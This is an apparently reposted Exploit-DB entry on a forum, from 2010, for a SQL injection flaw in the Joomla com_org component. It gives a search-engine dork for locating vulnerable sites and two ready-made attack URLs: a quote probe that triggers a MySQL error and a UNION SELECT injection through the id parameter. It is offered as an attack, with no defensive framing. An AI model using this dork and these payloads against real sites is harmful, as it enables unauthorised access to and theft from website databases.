romanu Posted March 14, 2010 Report Posted March 14, 2010 # Title: Joomla Component com_org SQL Injection Vulnerability # EDB-ID: 11725 # CVE-ID: () # OSVDB-ID: () # Author: N2n-Hacker # Published: 2010-03-14 # Verified: no # Download Exploit Code# Download N/Aview sourceprint?############################################################################### ## ## ## Joomla com_org SQL Injection Vulnerability ## ## ## ############################################################################### \\\\\\\\\\\\\\\\\\\\\\\\\\\N2n-Hacker - 2nd@live.fr//////////////////////////// ******************************************************************************* => Dork = inurl:"option=com_org" ------------------------------------------------------------------------------- # EXp : http://www.website.com/path/index.php?option=com_org&task=info&id=22' <=[sqlI] --?=en Error = "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version" # http://www.website.com/path/index.php?option=com_org&task=info&id=-22 UNION SELECT 1,2 ..... --?=en ******************************************************************************** \\\\\\\\\\\\\\\\\\ BAD LIFE ////////////////// ******************************************************************************** Quote